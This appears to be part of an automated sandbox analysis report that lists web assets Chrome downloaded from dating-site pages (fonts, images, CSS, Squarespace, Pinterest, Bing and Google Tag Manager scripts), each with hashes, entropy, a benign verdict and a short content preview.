                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), CFF, length 27544, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):27544
                                                                                                                                                                                                                                                                                Entropy (8bit):7.988567777864947
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:4yEu+LlO6plJtCfB1t301M6ud4HrRT4iOew3eFvBH:XgLlO811MVwtTNOeKuH
                                                                                                                                                                                                                                                                                MD5:A7F9B0C3AD58DD5ABE66167BB73E5FE5
                                                                                                                                                                                                                                                                                SHA1:5DD78DAFC4308AEAB7828509EBC39F6115C6E8AC
                                                                                                                                                                                                                                                                                SHA-256:B5B5A8688727D2D3A1C74C15F0BDC12730E0316E7B5F6EC800B905318BF4088B
                                                                                                                                                                                                                                                                                SHA-512:961377E5E7A56079EA60C806DB705C61DFED2825FA4573DFBA7C739F7391AC03413FD3A8B631B34AE671973ACC749258343F0466DED98725374B52CD5AC0FB8F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://use.typekit.net/af/e51fb7/00000000000000007735adc9/30/l?subset_id=2&fvd=n7&v=3
                                                                                                                                                                                                                                                                                Preview:wOF2OTTO..k........0..k;............................?DYNA.j..<?GDYN.Y.....`..N.6.$..L....+. .F...X.8..t.CDQ..............U@..................Jz.{..=C..Q......>a...f.%....k.t:2..F. ".1.47D}..8Q!.hD..B....V..,<.xV/.f..4......y.~.r..y.|.u...y.^...w.(E#..,.............k....h..P.F.Y.`........b.m....{....zf......t..lwC.K....CD...Y..b1..<.JVkx...........U.....^L_V...!H.$.}.=Q.o.S.7..........!..*q#.P..|*..4V1H.+.3..%b...4.l...Cn... ..1]..|.w...c...u.&T0...........v...I...>........{...N.X...NRU.N....N.;.....e....EGaSV....r.\....?...@...=...K.$b...."'....b.1...H.|..F...9.|z.(]T[.......E.;W..Z.....n...p.J....S.......O..a.V,L..w.A....U.:.,.L..]..F,........Ig...S.`..a.......Qq..$.....D...1..Mr*$......%....~D.(.#H...{mk.u..^.....ok.H.F....8..?x.@.......!.2...a/...3r..}.G..>jt..}f..u..RS.RgQy..,#...%.S..\.9.W.8W........?....1.w...i.........&GSs..z8i.....%..L..e.g..fu..B..@)T@-4@#t......!8..Q.F....I.......8....\..q....x.o.c|.O......_...Y.Z.ZQ'.....-...
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 513 x 217, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):10817
                                                                                                                                                                                                                                                                                Entropy (8bit):7.907401925858262
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:TmmfNa7v1TitOl/MKf6OmVCQe9ZaysjOEtd+CzNy3o8KRMtU2drf:SmUb1Trf6dze99qf1y3XEM/db
                                                                                                                                                                                                                                                                                MD5:E70ED789483D895FBBA9CF1E1A412A3F
                                                                                                                                                                                                                                                                                SHA1:E392527544CEA5FD09D4DD08BA4E7FD31C5A3C12
                                                                                                                                                                                                                                                                                SHA-256:90E384F1882556FC4473EBF352357BD82A104B0645E1A9A0FC2DA96135267E10
                                                                                                                                                                                                                                                                                SHA-512:BDAC99149E04E630E3684746F1DC8DFC29A471D221E2897550B9F9B2F9C9692761BFE00CCB83BE56663CFC47D430D5ACF5E97658240102369F06BEFDE985F973
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/87b0a6e8-4e6f-4194-ae3e-51e8402c7cde/logo.png?format=1500w
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.....................pHYs...#...#.x.?v.. .IDATx..=r......:.Z1..D.X.^A..]...^....^..N]...)UYY.&T......Z.,. .. y.f4..E@".\.....!..C..~...b.N..eh........mw..B.!v.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!...B.@.!.....B.!..P..B.!=."..B..)....BHO.. ..Bz.E.!...S(..!........c8.....eXoO........|...!....0...... ...@...9.F...@. ..Q...].._....L..H.v........N...k....lP.|._#||.V..rW...4j.. ..K..........Zv..l4.....?K.B..A..?..8..e8....._S.p.!._.B^;=..-.\..}.".u...nQ....u.|.<.e..i...j.d[&(..>.....P..|3zM..A,.~AD.u..~....Jf.. 33...".O..8..I...hN\.a....y.,...e.%.....?.p.3}.....=.G.%....~w......y....s..q8..`_..!.\^....A.(..K....B....~X.`.Z.N..+.N=o.-Z.. .{..Nu....)d........u.........I.....50]B&..~.4bA..P.m[.4.R..pG...... .ln.7.....f....T......'Qc.#j..t.e
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):2859
                                                                                                                                                                                                                                                                                Entropy (8bit):5.128976775297061
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:HrjSTxswDB/P7LUS0BvpKkR2/HSXmpgMPnfFrYHe1rcYlX3orrkwEv4Hm6Hid:HC+2/Vpb/flue1pFwEv4Hmo0
                                                                                                                                                                                                                                                                                MD5:0E4A098F3F6E3FAEDE64DB8B9DA80BA2
                                                                                                                                                                                                                                                                                SHA1:65B9B3C849F3FBDD783DDBFB183616FF55C7EE53
                                                                                                                                                                                                                                                                                SHA-256:AB21762C3F447AA08CBEFD5EA3866165F925BD5058A9AE19E23721462DE6FB60
                                                                                                                                                                                                                                                                                SHA-512:47CF04B377C4D5D512EE93439D17D21F6E0C5011E3CDC9EBE2835C91B6BFE7D5B3E4E23DD8C00017D7B235D08A8524A103EDF3A199C8B1D5CB9A182D8D5EAE73
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.6
                                                                                                                                                                                                                                                                                Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4779), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):4779
                                                                                                                                                                                                                                                                                Entropy (8bit):5.432966155708213
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:9WsFpRR6JYMuuwCp0yXALwpdh02MGkm8NhRe61pecbt:9+d2CpRpjfMiMRHwcbt
                                                                                                                                                                                                                                                                                MD5:7487394C252ED25468A2037369D345E5
                                                                                                                                                                                                                                                                                SHA1:77E52C98B573C8DAD4542BA35D98A213B004D8AD
                                                                                                                                                                                                                                                                                SHA-256:919293E56B6A814A84A579B014F63A2423B0419C418494DA7BAA7C0C5893CDE1
                                                                                                                                                                                                                                                                                SHA-512:D60AA3C9FB3E33573819398EF86C8813AABE2B2932C65637D9BBF53860B760EA917E2FDA41C1B2EEF0D89EB9AC4495FD76E521B4B472D6C126770EAFBAED1BAD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://s.pinimg.com/ct/core.js
                                                                                                                                                                                                                                                                                Preview:!function(t){var i={};function r(n){var e;return(i[n]||(e=i[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,r),e.l=!0,e)).exports}r.m=t,r.c=i,r.d=function(n,e,t){r.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},r.t=function(e,n){if(1&n&&(e=r(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(r.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)r.d(t,i,function(n){return e[n]}.bind(null,i));return t},r.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return r.d(e,"a",e),e},r.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},r.p="",r(r.s=2)}([function(n,e){function t(n,e){return function(n){if(Array.isArray(n))return n}(n)||function(n,e){var t=null==n?null:"undefined"!=typ
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (50522), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):50523
                                                                                                                                                                                                                                                                                Entropy (8bit):5.297134171375771
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:IaOFhhR9OIFhOjfRysgLzQyVwhYyDMsWxKQ:IaOFnR2DRszQekTWUQ
                                                                                                                                                                                                                                                                                MD5:14272A6CDF99BDC079B8EC8097889F49
                                                                                                                                                                                                                                                                                SHA1:2343F9F1D29F3B034F3B8FFB7A92BFFD98A88450
                                                                                                                                                                                                                                                                                SHA-256:73AAA4E6BFC1DBED5F3F934710D1ADA545F4068742235E59D0CB74F0EAF0A3C4
                                                                                                                                                                                                                                                                                SHA-512:BD83B900ACBFB123F485F46DE1692710B7C77DE90739CA3CFAB7A58CF3B71FCD9D97FCCEC6762528886C57A41F101574209F65B2BEF745613F0BCB7D196200A5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://bat.bing.com/bat.js
                                                                                                                                                                                                                                                                                Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):149805
                                                                                                                                                                                                                                                                                Entropy (8bit):5.6004134683803555
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Cnxj4bndhXdOU0tNo455wjdrm/bK+OTRMWMrvBDJTcitj+wf2EAeiPWMWNZVgdyo:Cnxj479OU03o4PwjhIBVT39ROyuvb
                                                                                                                                                                                                                                                                                MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
                                                                                                                                                                                                                                                                                SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                                                                                                                                SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                                                                                                                                SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (53553)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):245728
                                                                                                                                                                                                                                                                                Entropy (8bit):5.47183556659378
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:/Boy/mg2YYE16IriimjoW1iioO7MYp9zg3sWMyD9j:JoyuRNIribjFiioO7MQ9zoPz
                                                                                                                                                                                                                                                                                MD5:37F6C6A4F3E12B7931F736432A135726
                                                                                                                                                                                                                                                                                SHA1:5B0D94016AC3DB1C7DB1E372EEA9DC0054891398
                                                                                                                                                                                                                                                                                SHA-256:6F8EC5CD511FB4B96C8B573F86B1A62D8322C0286268EECC224C0AA2F30BE18E
                                                                                                                                                                                                                                                                                SHA-512:9FAE27901D39A6E8BAF07B10962AE3794723868FD090F6D8D9119486F9409D9341782B4BB7D8B67E62CE7FFD3A4129DDD22581A5A48F231DE3FB8BDD5F07F7BF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-61293f01d648eef165fc-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[97684],{415611:(e,V,T)=>{"use strict";T.r(V),T.d(V,{YUI:()=>_}),e=T.hmd(e);var m=T(760636);/**.@license.YUI 3.17.2 (build 9c3c78e).Copyright 2014 Yahoo! Inc. All rights reserved..Licensed under the BSD License..http://yuilibrary.com/license/.*/typeof _!="undefined"&&(_._YUI=_);var _=function(){var v=0,u=this,n=arguments,d=n.length,r=function(i,f){return i&&i.hasOwnProperty&&i instanceof f},a=typeof YUI_config!="undefined"&&YUI_config;if(r(u,_)?(u._init(),_.GlobalConfig&&u.applyConfig(_.GlobalConfig),a&&u.applyConfig(a),d||u._setup()):u=new _,d){for(;v<d;v++)u.applyConfig(n[v]);u._setup()}return u.instanceOf=r,u};(function(){var v,u,n="3.17.2",d=".",r="http://yui.yahooapis.com/",a="yui3-js-enabled",i="yui3-css-stamp",f=function(){},g=Array.prototype.slice,A={"io.xdrReady":1,"io.xdrResponse":1,"SWF.eventHandler":1},E=typeof window!="undefined",h=E?window:null,s=E?h.document:null,c=s&&s.documentElement,o=c&&c.className
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4985
                                                                                                                                                                                                                                                                                Entropy (8bit):4.054105046787087
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:F1vGZ4QLnMLWLiDmnD8SebQe2Fn5/RaxE9drukEyG3uQgQDRd:F1vGZ40nMLsDgbQe2x5/RaShukkud0/
                                                                                                                                                                                                                                                                                MD5:880AE5BA69E733FE8F2F738FAE4A4697
                                                                                                                                                                                                                                                                                SHA1:35F61B040E874527F18E50217B102903F0225769
                                                                                                                                                                                                                                                                                SHA-256:EB63B347867714C233D220F8A2C96731112752B10B40B71266BEABF7988C2DA5
                                                                                                                                                                                                                                                                                SHA-512:1CF7DE5F564C4277AFBAE7B13143B1DFCAF73F72546B2AC07D8F939809BD31AF7FAA44F6942D9EC69B1B5E4A87314AA03FAF7FF41A588D49BCAB165A09D60194
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:<svg width="266" height="111" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><path d="M27.945 49.395c-1.938.893-5.546 1.605-9.64 1.605C7.124 51 0 44.174 0 33.336 0 23.246 6.922 15 19.788 15c2.847 0 5.965.513 8.212 1.36l-1.676 7.97c-1.3-.576-3.187-1.098-6.022-1.098-5.688 0-9.338 4.027-9.296 9.672 0 6.338 4.265 9.7 9.472 9.7 2.57 0 4.545-.451 6.198-1.122l1.269 7.913zM34 0h10.823v19.681h.141c1.132-1.509 2.517-2.656 4.232-3.558 1.604-.864 3.622-1.368 5.626-1.368 6.9 0 12.178 4.742 12.178 15.135V50H56.177V31.065c0-4.537-1.574-7.639-5.583-7.639-2.884 0-4.652 1.827-5.422 3.785-.272.643-.35 1.566-.35 2.342V50H34V0zm40.275 27.053c0-5.025-.089-8.335-.275-11.284h9.012l.382 6.337h.259C85.383 17.097 89.49 15 92.757 15c.97 0 1.463.025 2.243.199v10.006a12.818 12.818 0 00-2.836-.297c-3.853 0-6.485 2.074-7.19 5.404-.132.677-.195 1.506-.195 2.369V50H74.275V27.053zM101.294 50h10.412V15.813h-10.412V50zM112 6.321c.014 2.96-2.126 5.31-5.589 5.31-3.29 0-5.424-2.35-5.41-5.31C100.986 3.2
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (451), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):451
                                                                                                                                                                                                                                                                                Entropy (8bit):5.175708776160106
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:+hjcxClKXxjcxClKXlrqQOjJ4EOrB2QTKkhpFvwG2PiqyERIWiW1t1NvRLlydi+C:+dcxCWcxC0qQOjQd9udy2IiVlydiF
                                                                                                                                                                                                                                                                                MD5:4D6A40A696D1ABBDF25CD121AA88B10E
                                                                                                                                                                                                                                                                                SHA1:F6288297D9CD2BD6FB5024E8B116B83C0C2050BE
                                                                                                                                                                                                                                                                                SHA-256:A61DDD7C4DB00FA694A870C95E1D2AFA9FA3BF7034D92C8F68A341FC21EDB053
                                                                                                                                                                                                                                                                                SHA-512:113E5513D9BB75093DDC37D801C561D092F9DF76F6DC7DFECA38FF74435D4FE796A569DF62800E7BE87873A446E313D90A6142AEF6F93D4B50C6FFC51696308C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunknew_bedford_framework=self.webpackChunknew_bedford_framework||[]).push([[9528],{96418:function(e,n,t){t.r(n);var a=t(59440),o=t(16024);n.default=function(e){(0,o.A)().then((function(){var n=(0,a.T)(window,"Y.Squarespace.Singletons.ShoppingCart",null);n&&(n.on("item-added",(function(n){e.classList.remove("hidden")})),n.after("load",(function(n){n.target.get("totalQuantity")>0&&e.classList.remove("hidden")})))}))}}}]);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 678 x 182, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24296
                                                                                                                                                                                                                                                                                Entropy (8bit):7.933020929555668
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:nCh/biUlxYpd1gtl8Ls5KKV/H2aIAo1KeQVSpDne7kzQGWIgbArQsw4d5iPMTMfH:0biUMdmtlasYKV+PAsKmTokzQGHAktwt
                                                                                                                                                                                                                                                                                MD5:5BC93528FDCBED8E4755A169A3CD7E4A
                                                                                                                                                                                                                                                                                SHA1:CC71740481D90B2CA0D17FDCB3A96E0DFB4CD0EC
                                                                                                                                                                                                                                                                                SHA-256:28A23FFBD983A60B0F0660352F16D905061FDD83B2106E865EBE0C58AA66DAB8
                                                                                                                                                                                                                                                                                SHA-512:91B2C4605654453A587C5050F51DA74194241ED65EF358317C6E636B0E34E558F8EB8DABD1D30486BE1603654C7157366DB7A146603E296145F0AC1A9C671B58
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............P.z...ViCCPicc..x..wX.....g$!..A@F.K..CF.+..!.JH...cHPq.R...Q.hU...H..Z.R..u...TjQ......g....<..<.s_...{.9.&....h..I$..&@.X&M..fMLKg....F.&...._$a..E.2....... ..4...;......X..,A...q3.../.........d.. ............,....IJ. n.PQ..9..w..*.....G.".....c...sy.......N..J.v._....w.g1s._....<^....0..Q...7...VX .+....\iD.`.....iQ....G....X.....@.8#W......E.t...]...(.....1.J=+[..E..x.H.MBl.x..(4Q.]:-Ay.^.-..y..@y.=y~2[..E....O...&."f .*... VG.\......_.........[!N......liX....h.^b{.....C...E..3|.P....bv.p.a....Z..PE....89Q..D....K2$.qJ..BX.>.[ v/*NT.%Sd.$.....Y\."O.$.....\.....`...,..y j.i...r%.x .....B..:."F.D(.?...hd_......aXU>. {h.xhG><B\.QP.B.........#E..yh.Q..h........).JE>|"Kc..J..FP.....@.......+.M.......Ay@.F..*Z$."....re....y/H....&.Qt...'...tG..@t..R9.Q._....>......G..v_.TwP...^...e.Y.......s>...Q_z.K...9..q.8F4..8I4...q.#......9-a(.|.G.....N...t..W..3e..3M2K*...... dq.|.1,W.WW..w....x...~......r``..OZ.I....G?iv..Z
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5304), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):5304
                                                                                                                                                                                                                                                                                Entropy (8bit):4.990303437495686
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:Vc2SCORWWND0JjIDGX8ZKi65Zkhu9FsbeCDm5Mk9rCWhv:V0CORWWNQpIDGMZKi65p9FeqMk9GWhv
                                                                                                                                                                                                                                                                                MD5:5767A6A32751F5575D7CD1955A15266F
                                                                                                                                                                                                                                                                                SHA1:75B88DC45B6CFF749D9A284E80EF517173465444
                                                                                                                                                                                                                                                                                SHA-256:921CDA4A276E21EE38BC6C39446D5409DE99B21EA99471A2BF9C84DB9555AC04
                                                                                                                                                                                                                                                                                SHA-512:61D3577F1C82AD6A4BCFB3F014870ECFA462D06DFE728D5BFEF3AB93F6F223F8E8EB9C0DA78CA97880CB89A6FB5554535EBFF98D988D6F0A034A57E8C4453493
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/css/magnific-popup.min.css?ver=1.1.0
                                                                                                                                                                                                                                                                                Preview:.mfp-bg{top:0;left:0;width:100%;height:100%;z-index:1042;overflow:hidden;position:fixed;background:#0b0b0b;opacity:.8}.mfp-wrap{top:0;left:0;width:100%;height:100%;z-index:1043;position:fixed;outline:0!important;-webkit-backface-visibility:hidden}.mfp-container{text-align:center;position:absolute;width:100%;height:100%;left:0;top:0;padding:0 8px;box-sizing:border-box}.mfp-container:before{content:'';display:inline-block;height:100%;vertical-align:middle}.mfp-align-top .mfp-container:before{display:none}.mfp-content{position:relative;display:inline-block;vertical-align:middle;margin:0 auto;text-align:left;z-index:1045}.mfp-ajax-holder .mfp-content,.mfp-inline-holder .mfp-content{width:100%;cursor:auto}.mfp-ajax-cur{cursor:progress}.mfp-zoom-out-cur,.mfp-zoom-out-cur .mfp-image-holder .mfp-close{cursor:-webkit-zoom-out;cursor:zoom-out}.mfp-zoom{cursor:pointer;cursor:-webkit-zoom-in;cursor:zoom-in}.mfp-auto-cursor .mfp-content{cursor:auto}.mfp-arrow,.mfp-close,.mfp-counter,.mfp-preloader{
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2861)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):225494
                                                                                                                                                                                                                                                                                Entropy (8bit):5.542622145683824
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:zOIp9SXNKW4BnM9Z0xOKCcuBcO9yyqoiAuxixEUDF2Dej7gdFeT/yZk:6IGKl54dcvOzDF2Dej7gdFeTv
                                                                                                                                                                                                                                                                                MD5:912B34836A56FB97FE368842EAF82C74
                                                                                                                                                                                                                                                                                SHA1:28145D565CBB9C50497BE6401440F6A64A935569
                                                                                                                                                                                                                                                                                SHA-256:B2F1357EC253B6E077E17E0A277CE672377B798AEE30EAA0F3C7A2AED51B655B
                                                                                                                                                                                                                                                                                SHA-512:1619741C57E548AC137A93639A13D99F94E3458D847D97957A1A011AB5AEC6CE4EF4C77D1FD6DF4F0974B0238F79B9BF946021C194524A38880EA4475CB3C4F2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://www.googletagmanager.com/gtm.js?id=GTM-W5JKC56
                                                                                                                                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__jsm","vtp_javascript":["template","(function(){var a=window.location.hostname,a=a.split(\".\").slice(-2);return a=a.join(\".\").toLowerCase()})();"]},{"function":"__e"},{"function":"__c","vtp_value":"jdate.co.il, jdate.fr, jdate.uk, about.jdate.com, jlife.jdate.com, about.jdate.co.il"},{"function":"__c","vtp_value":"GTM-W5JKC56"},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_fieldsToSet":["list",["map","fieldName","allowLinker","value","true"]],"vtp_useHashAutoLink":false,"vtp_autoLinkDomains":["macro",2],"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":["macro",3],"vtp_enableUaRlsa":false,"vtp_enableUseInte
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1290), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1290
                                                                                                                                                                                                                                                                                Entropy (8bit):5.0061960284971
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:yUwIHK32rzjmVYjAZfyzDexPIiEJCI4tbFaIq36IlmKaPIBkxa2rmSNMQno1/yyW:0JMzjmM5CxwCTYxqwmZkqfrmSNMQo1yL
                                                                                                                                                                                                                                                                                MD5:44A5F68A690C01F4439A52AC7F630A82
                                                                                                                                                                                                                                                                                SHA1:D5AFE05631E626FDC44365A339128530F78B2826
